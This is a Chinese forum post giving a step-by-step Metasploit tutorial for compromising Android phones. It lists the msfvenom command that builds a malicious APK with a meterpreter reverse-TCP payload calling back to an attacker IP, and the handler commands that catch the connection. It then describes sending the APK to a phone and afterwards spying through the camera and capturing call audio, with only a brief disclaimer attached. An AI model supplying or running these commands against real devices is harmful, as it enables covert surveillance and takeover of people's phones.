找回密码
 注册

QQ登录

只需一步,快速开始

Metasploit之安卓渗透之旅
首先打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。


msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 r>/root/123.apk 

-p 是Payload to use
Lhost 攻击者的ip,就是自己的ip
Lport 攻击者的端口,(有高端口可能不是很容易被杀的一说,本人没证实)
r>/root/123.apk 文件生成的路径及文件名
然后就是搭建自己的客户端。


use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set LHOST 192.168.1.101 
set LPORT 4444 
Exploit 


是时候将恶意的APK发送到手机上。
下载>安装:

至于如何绕过免杀,请在公众号中查看详细教程。
然后我们打开后,查看MSF:

然后我们就可以为所欲为~比如看摄像头啊,截取通话语音啊,视频快照啊,当然我们是不用做违法用途的。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
分享至 : QQ空间
收藏
有没有参加CTF比赛的,一起组队啊!

0 个回复

您需要登录后才可以回帖 登录 | 注册